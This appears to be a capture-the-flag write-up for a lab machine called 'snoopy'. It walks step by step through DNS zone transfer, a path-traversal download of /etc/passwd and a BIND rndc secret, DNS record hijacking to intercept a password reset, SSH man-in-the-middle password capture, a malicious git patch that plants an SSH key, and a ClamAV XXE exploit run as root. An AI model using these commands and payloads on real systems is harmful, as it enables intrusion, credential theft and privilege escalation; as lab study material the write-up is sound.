hard - snoopy

User Flag

Checking ports

22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
53/tcp open  domain  ISC BIND 9.18.12-0ubuntu0.22.04.1 (Ubuntu Linux)
80/tcp open  http    nginx 1.18.0 (Ubuntu)

HTML Review

The most relevant by reading html source code:

Interesting links:

<a href="blog-details.html" class="readmore stretched-link"><span>Read More</span><i class="bi bi-arrow-right"></i></a>
<a href="contact.html" class="btn-get-started">Get Started</a>
<li><a href="about.html">About</a></li>
<li><a href="contact.html">Contact</a></li>
<li><a href="index.html" class="active">Home</a></li>
<li><a href="team.html">Team</a></li>
Main webpage snoopy.htb
― Main webpage snoopy.htb ―

Also something interesting, given that the server is listening on port 53:

<p>Attention:  As we migrate DNS records to our new domain please be advised that our mailserver 'mail.snoopy.htb' is currently offline.</p>

DNS Exploitation

Then I just decided to test if the server broadcasts its DNS records, it does:

~➤ dig @snoopy.htb -tAXFR snoopy.htb
; <<>> DiG 9.18.18 <<>> @snoopy.htb -tAXFR snoopy.htb
; (1 server found)
;; global options: +cmd
snoopy.htb.             86400   IN      SOA     ns1.snoopy.htb. ns2.snoopy.htb. 2022032612 3600 1800 604800 86400
snoopy.htb.             86400   IN      NS      ns1.snoopy.htb.
snoopy.htb.             86400   IN      NS      ns2.snoopy.htb.
ns1.snoopy.htb.         86400   IN      A
ns2.snoopy.htb.         86400   IN      A
mattermost.snoopy.htb.  86400   IN      A
postgres.snoopy.htb.    86400   IN      A
provisions.snoopy.htb.  86400   IN      A
mm.snoopy.htb.          86400   IN      A
www.snoopy.htb.         86400   IN      A
snoopy.htb.             86400   IN      SOA     ns1.snoopy.htb. ns2.snoopy.htb. 2022032612 3600 1800 604800 86400
;; Query time: 146 msec
;; WHEN: Mon Aug 21 21:34:30 -04 2023
;; XFR size: 11 records (messages 1, bytes 325)

What is that mm.snoopy.htb? Ah Mattermost app:

Mattermost app
― Mattermost app ―

Download via LFI

Ok, so that /download is able to download Local files (LFI):

$ wget http://snoopy.htb/download?file=....//....//....//....//etc/passwd -O file.zip ; \
      unzip -f ./*.zip ; \
      find press* -type f -exec cat {} +

cbrown❌1000:1000:Charlie Brown:/home/cbrown:/bin/bash
sbrown❌1001:1001:Sally Brown:/home/sbrown:/bin/bash
cschultz❌1004:1005:Charles Schultz:/home/cschultz:/bin/bash
vgray❌1005:1006:Violet Gray:/home/vgray:/bin/bash

There we can see a bunch of users, I guess we will need to pivot between them cbrown, sbrown, lpelt, cshultz, vgray, clamav?.

Now, I will download /etc/bind/named.config, the following “rndc-key” should be stored in a separated file.

include "/etc/bind/named.conf.options";
include "/etc/bind/named.conf.local";
include "/etc/bind/named.conf.default-zones";

key "rndc-key" {
    algorithm hmac-sha256;
    secret "BEqUtce80uhu3TOEGJJaMlSx9WT2pkdeCtzBeDykQQA=";

Intercepting SNMP messages

z➤ python -m smtpd -c DebuggingServer -n

~z➤ cat config
key "rndc-key" {
    algorithm hmac-sha256;
    secret "BEqUtce80uhu3TOEGJJaMlSx9WT2pkdeCtzBeDykQQA=";
~z➤ nsupdate -k config
> server 53
> key hmac-sha256:rndc-key BEqUtce80uhu3TOEGJJaMlSx9WT2pkdeCtzBeDykQQA=
> zone snoopy.htb
> update add mail.snoopy.htb 86400 A
> send

Keep in mind, is snoopy.htb and is my own IP.

Now we proceed to reset cbrown@snoopy.htb password on http://mm.snoopy.htb/reset_password you will get this message captured and get a token:

b'Reset Your Password'
b'Click the button below to reset your password. If you didn=E2=80=99t reques='
b't this, you can safely ignore this email.'
b'Reset Password ( http://mm.snoopy.htb/reset_password_complete?token=3Dcqnjz='
b'gpxjwwqb7exk55sp6sjwkzdu3i8d4x4j3snhihydxkqfnew1o1rx5gq76qb )'
b'The password reset link expires in 24 hours.'

We are now able to login into mm using that token the reset cbrown’s password:

Reset cbrown password
― Reset cbrown password ―

Intercetp SSH password by provisioning a server

I notice we have a command that helps us to provision a server via SSH, we can intercept that information.

Prov a server
― Prov a server ―

We start SSH MITM python tool:

~z➤ nohup sudo socat TCP-LISTEN:2222,fork TCP: &

~z➤ sudo ./ssh-mitm-x86_64.AppImage server --remote-host snoopy.htb
───────────────────────────────────────────────────────────────────── SSH-MITM - ssh audits made simple ──────────────────────────────────────────────────────────────────────
Version: 3.0.2
License: GNU General Public License v3.0
Documentation: https://docs.ssh-mitm.at
Issues: https://github.com/ssh-mitm/ssh-mitm/issues
generated temporary RSAKey key with 2048 bit length and fingerprints:
listen interfaces and :: on port 10022
────────────────────────────────────────────────────────────────────────── waiting for connections ───────────────────────────────────────────────────────────────────────────

Once we provide a server from MM, we can see the password in the logs:

[08/25/23 10:36:58] INFO     ℹ session fe324ce5-e93b-4d1a-8a06-91d198f6dd78 created
[08/25/23 10:36:59] INFO     ℹ client information:
                               - client version: ssh-2.0-paramiko_3.1.0
                               - product name: Paramiko
                               - vendor url:  https://www.paramiko.org/
                             ⚠ client audit tests:
                               * client uses same server_host_key_algorithms list for unknown and known hosts
                               * Preferred server host key algorithm: ssh-ed25519
[08/25/23 10:37:00] INFO     Remote authentication succeeded
                                     Remote Address: snoopy.htb:22
                                     Username: cbrown
                                     Password: sn00pedcr3dential!!!
                                     Agent: no agent
[08/25/23 10:37:01] INFO     ℹ fe324ce5-e93b-4d1a-8a06-91d198f6dd78 - local port forwading
                             SOCKS port: 41275
                                 * socat: socat TCP-LISTEN:LISTEN_PORT,fork socks4:,socksport=41275
                                 * netcat: nc -X 4 -x localhost:41275 address port
                                 * netcat: nc -X 5 -x localhost:41275 address port
                    INFO     got ssh command: ls -la
[08/25/23 10:37:02] INFO     ℹ fe324ce5-e93b-4d1a-8a06-91d198f6dd78 - session started
                    INFO     got remote command: ls -la
                    INFO     remote command 'ls -la' exited with code: 0
                    INFO     ℹ session fe324ce5-e93b-4d1a-8a06-91d198f6dd78 closed

And we are now on cbrowns user shell:

.../p8/snoopy/lfi➤ ssh cbrown@snoopy.htb
cbrown@snoopy.htb's password:
cbrown@snoopy:~$ id
uid=1000(cbrown) gid=1000(cbrown) groups=1000(cbrown),1002(devops)
cbrown@snoopy:~$ ls

Exploiting Git CVE

From here we have to pivot into another user account, I think cbrown :evil: (CVE-2023-22490 and CVE-2023-23946)

cbrown@snoopy:~$ sudo -l
[sudo] password for cbrown:
Sorry, try again.
[sudo] password for cbrown:
Matching Defaults entries for cbrown on snoopy:
    env_keep+="LANG LANGUAGE LINGUAS LC_* _XKB_CHARSET", env_keep+="XAPPLRESDIR XFILESEARCHPATH XUSERFILESEARCHPATH", secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, mail_badpass

User cbrown may run the following commands on snoopy:
    (sbrown) PASSWD: /usr/bin/git ^apply -v [a-zA-Z0-9.]+$

Generating a key:

cbrown@snoopy:~$ ssh-keygen -t rsa
Generating public/private rsa key pair.
Enter file in which to save the key (/home/cbrown/.ssh/id_rsa):
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /home/cbrown/.ssh/id_rsa
Your public key has been saved in /home/cbrown/.ssh/id_rsa.pub
The key fingerprint is:
SHA256:yFq39a/ji6BsODGk9MPACg64VBilUiWjslGJuBDdbX4 cbrown@snoopy.htb
The key's randomart image is:
+---[RSA 3072]----+
|o=O=..           |
|+=++. o          |
|B+.  o           |
|B++ ....E        |
|*+ *  +.S .      |
|o.. *o . o .     |
|    .=  o   .    |
|    o... . ...   |
|     oo   ..++.  |
Exploiting Git CVEs:
cbrown@snoopy:~$ mkdir repo; cd repo
cbrown@snoopy:~/repo$ git init
hint: Using 'master' as the name for the initial branch. This default branch name
hint: is subject to change. To configure the initial branch name to use in all
hint: of your new repositories, which will suppress this warning, call:
hint:   git config --global init.defaultBranch <name>
hint: Names commonly chosen instead of 'master' are 'main', 'trunk' and
hint: 'development'. The just-created branch can be renamed via this command:
hint:   git branch -m <name>
Initialized empty Git repository in /home/cbrown/repo/.git/

cbrown@snoopy:~/repo$ echo "diff --git a/symlink b/renamed-symlink
similarity index 100%
rename from symlink
rename to renamed-symlink
diff --git /dev/null b/renamed-symlink/create-me
new file mode 100644
index 0000000..039727e
--- /dev/null
+++ b/renamed-symlink/authorized_keys
@@ -0,0 +1 @@
+ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDKedRFqb+23I77T/09HrcXnhZIYcDNJGk1k4V8mcg1pDCBTb+0N2hadgS4QuT846ZOsKFtBqiaZSaPebZAPw0htj7jrX2rsy0zrhXyWnaVFo0vYmVxogVYL7p67rM96vn4XW4+NaupBRvg07CNGdGgekoKj2TP8dCo/UPiSt5lCN0siYuQKuTI/VJnD6soy9TNGMV9hnX6UHDqnM8+PEu7oLaEPRz/ergSLxgHs/5qvZeeLTrhWtgvZkhHrp1dPWGVB+BY9+/EjvimeFbnvltAuMf8w8+fD1J5YoiK009buSOe/s4LaeLcWyFEoCGqEAVOWI8EqcH1XSumesAEvNoxpXjHKmwyQpRhXjwPGBSlteTCmFvGUBncY8YktV46hmHP+i1rLowyPhnbBWpMV7DOtfAPE5jZaXKNjmdKm0dgYwsHGkV677YcdDrg9FUM1wleECo8X+3w4GkFW3n+dWMK6hKeEosuW8IJX0SeTL+ESLBHVCrQaR9iWIKIRz/TFQU= cbrown@snoopy.htb" > patch

cbrown@snoopy:~/repo$ ln -s /home/sbrown/.ssh symlink
cbrown@snoopy:~/repo$ chmod 777 /home/cbrown/repo

cbrown@snoopy:~/repo$ sudo -u sbrown /usr/bin/git apply -v patch
Checking patch symlink => renamed-symlink...
Checking patch renamed-symlink/authorized_keys...
Applied patch symlink => renamed-symlink cleanly.
Applied patch renamed-symlink/authorized_keys cleanly.

cbrown@snoopy:~/repo$ ssh sbrown@snoopy.htb
sbrown@snoopy:~$ id
uid=1001(sbrown) gid=1001(sbrown) groups=1001(sbrown),1002(devops)
sbrown@snoopy:~$ ls
scanfiles  user.txt

Root Flag

What we have in sudo?

sbrown@snoopy:~$ sudo -l
Matching Defaults entries for sbrown on snoopy:
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, mail_badpass

User sbrown may run the following commands on snoopy:
    (root) NOPASSWD: /usr/local/bin/clamscan ^--debug /home/sbrown/scanfiles/[a-zA-Z0-9.]+$

ClamAV CVE-2023-20052

We exploit the vulnerability:

git clone https://github.com/nokn0wthing/CVE-2023-20052.git
cd CVE-2023-20052
sudo docker build -t cve-2023-20052 .
sudo docker run -v $(pwd):/exploit -it cve-2023-20052 bash

genisoimage -D -V "exploit" -no-pad -r -apple -file-mode 0777 -o test.img . && dmg dmg test.img test.dmg
bbe -e 's|<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">|<!DOCTYPE plist [<!ENTITY xxe SYSTEM "/etc/passwd"> ]>|' -e 's/blkx/&xxe\;/' test.dmg -o exploit.dmg

Now we run clamscan with debug mode as required by sudo:

sbrown@snoopy:~/scanfiles$ wget .
--2023-08-25 15:26:54--
Connecting to connected.
HTTP request sent, awaiting response... 200 OK
Length: 114823 (112K) [application/octet-stream]
Saving to: 'exploit.dmg'
2023-08-25 15:26:54 (253 KB/s) - ‘exploit.dmg’ saved [114823/114823]
sbrown@snoopy:~/scanfiles$ ls
sbrown@snoopy:~/scanfiles$ sudo /usr/local/bin/clamscan --debug /home/sbrown/scanfiles/exploit.dmg
LibClamAV debug: searching for unrar, user-searchpath: /usr/local/lib
LibClamAV debug: unrar support loaded from /usr/local/lib/libclamunrar_iface.so.11.0.0
LibClamAV debug: Initialized 1.0.0 engine

And you will see the flag :)

Clamscan CVE
― Clamscan CVE ―


  • Review RNDC

    rndc stands for Remote Name Daemon Control. It’s a command line tool used to manage the BIND DNS server. With rndc, you can control the operation of a name server.

  • Review in depth git: CVE-2023-22490 and CVE-2023-23946